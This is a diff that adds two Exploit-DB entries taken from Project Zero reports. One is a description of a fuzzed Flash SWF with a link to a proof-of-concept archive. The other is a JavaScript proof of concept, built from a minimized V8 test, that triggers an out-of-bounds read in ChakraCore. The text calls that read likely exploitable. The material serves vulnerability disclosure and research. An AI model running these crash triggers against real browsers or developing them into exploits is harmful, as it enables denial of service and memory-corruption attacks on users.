diff --git a/platforms/windows/dos/42480.txt b/platforms/windows/dos/42480.txt
new file mode 100755
index 000000000..1ae93b2c6
--- /dev/null
+++ b/platforms/windows/dos/42480.txt
@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1320
+
+The attached fuzzed swf file causes the traits of an ActionScript object to be accessed out of bounds. This can probably lead to exploitable type confusion. 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42480.zip
diff --git a/platforms/windows/dos/42481.js b/platforms/windows/dos/42481.js
new file mode 100755
index 000000000..c37682942
--- /dev/null
+++ b/platforms/windows/dos/42481.js
@@ -0,0 +1,177 @@
+// The attached JavaScript file causes an out-of-bounds access of the source buffer when fetching the source for one of the functions during delayed compilation. The out-of-bounds value is then treated as the pointer to the source. This is likely an exploitable condition.
+
+// In the debug build of Chakra, this script hits the following assert:
+
+// ASSERTION 19041: (/home/user/test_everywhere/ChakraCore/lib/Common/DataStructures/List.h, line 329) index >= 0 && index < this->count
+// Failure: (index >= 0 && index < this->count)
+// Illegal instruction (core dumped)
+
+// The attached script is a test case from the v8 (Chrome) test repository, minimized to show the issue.
+
+print = function(){};
+(function () {  
+
+  assertPromiseResult = function(promise, success, fail) {
+
+    if (!success) success = () => {};
+
+    failWithMessage = (msg) => eval("print(msg)");
+    if (!fail) {
+      fail = result => failWithMessage("assertPromiseResult failed: " + result);
+    }
+
+    var test_promise =
+        promise.then(
+          result => {
+            try {
+              success(result);
+            } catch (e) {
+              failWithMessage(e);
+            }
+          },
+          result => {
+            fail(result);
+          }
+        )
+        .then((x)=> {
+          if (--promiseTestCount == 0) testRunner.notifyDone();
+        });
+
+    if (!promiseTestChain) promiseTestChain = Promise.resolve();
+    // waitUntilDone is idempotent.
+    testRunner.waitUntilDone();
+    ++promiseTestCount;
+    return promiseTestChain.then(test_promise);
+  };
+
+
+ assertUnoptimized = function assertUnoptimized(fun, sync_opt, name_opt) {
+    if (sync_opt === undefined) sync_opt = "";
+    var opt_status = OptimizationStatus(fun, sync_opt);
+    // Tests that use assertOptimized() do not make sense if --always-opt
+    // option is provided. Such tests must add --no-always-opt to flags comment.
+    assertFalse((opt_status & V8OptimizationStatus.kAlwaysOptimize) !== 0,
+                "test does not make sense with --always-opt");
+    assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0, name_opt);
+    if ((opt_status & V8OptimizationStatus.kMaybeDeopted) !== 0) {
+      // When --deopt-every-n-times flag is specified it's no longer guaranteed
+      // that particular function is still deoptimized, so keep running the test
+      // to stress test the deoptimizer.
+      return;
+    }
+    assertFalse((opt_status & V8OptimizationStatus.kOptimized) !== 0, name_opt);
+  }
+
+
+
+
+
+
+ 
+  assertOptimized = function assertOptimized(fun, sync_opt, name_opt) {
+    if (sync_opt === undefined) sync_opt = "";
+    var opt_status = OptimizationStatus(fun, sync_opt);
+    // Tests that use assertOptimized() do not make sense if --no-opt
+    // option is provided. Such tests must add --opt to flags comment.
+    assertFalse((opt_status & V8OptimizationStatus.kNeverOptimize) !== 0,
+                "test does not make sense with --no-opt");
+    assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0, name_opt);
+    if ((opt_status & V8OptimizationStatus.kMaybeDeopted) !== 0) {
+      // When --deopt-every-n-times flag is specified it's no longer guaranteed
+      // that particular function is still optimized, so keep running the test
+      // to stress test the deoptimizer.
+      return;
+    }
+    assertTrue((opt_status & V8OptimizationStatus.kOptimized) !== 0, name_opt);
+  }
+
+  isNeverOptimize = function isNeverOptimize() {
+    var opt_status = OptimizationStatus(undefined, "");
+    return (opt_status & V8OptimizationStatus.kNeverOptimize) !== 0;
+  }
+
+  isAlwaysOptimize = function isAlwaysOptimize() {
+    var opt_status = OptimizationStatus(undefined, "");
+    return (opt_status & V8OptimizationStatus.kAlwaysOptimize) !== 0;
+  }
+
+  isInterpreted = function isInterpreted(fun) {
+    var opt_status = OptimizationStatus(fun, "");
+    assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
+               "not a function");
+    return (opt_status & V8OptimizationStatus.kOptimized) === 0 &&
+           (opt_status & V8OptimizationStatus.kInterpreted) !== 0;
+  }
+
+  isOptimized = function isOptimized(fun) {
+    var opt_status = OptimizationStatus(fun, "");
+    assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
+               "not a function");
+    return (opt_status & V8OptimizationStatus.kOptimized) !== 0;
+  }
+
+  isCrankshafted = function isCrankshafted(fun) {
+    var opt_status = OptimizationStatus(fun, "");
+    assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
+               "not a function");
+    return (opt_status & V8OptimizationStatus.kOptimized) !== 0 &&
+           (opt_status & V8OptimizationStatus.kTurboFanned) === 0;
+  }
+
+  isTurboFanned = function isTurboFanned(fun) {
+    var opt_status = OptimizationStatus(fun, "");
+    assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
+               "not a function");
+    return (opt_status & V8OptimizationStatus.kOptimized) !== 0 &&
+           (opt_status & V8OptimizationStatus.kTurboFanned) !== 0;
+  }
+
+})();
+
+
+// Copyright 2015 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+assertEquals = print;
+
+var m = (function() {
+  "use asm";
+  function f(x) {
+    return x < 0;
+  }
+  function g(x) {
+    return 0 < x;
+  }
+  return { f: f, g: g };
+})();
+var f = m.f;
+var g = m.g;
+
+var counter = 0;
+
+function deopt(f) {
+  return {
+    toString : function() {
+      print(f);
+      counter++;
+      return "2";
+    }
+  };
+}
+
+assertEquals(false, f(deopt(f)));
+assertEquals(1, counter);
+
+assertEquals(true, g(deopt(g)));
+assertEquals(2, counter);
+
+print(f);
+assertEquals(false, f(deopt(f)));
+assertEquals(3, counter);
+
+print(g);
+assertEquals(true, g(deopt(g)));
+assertEquals(4, counter);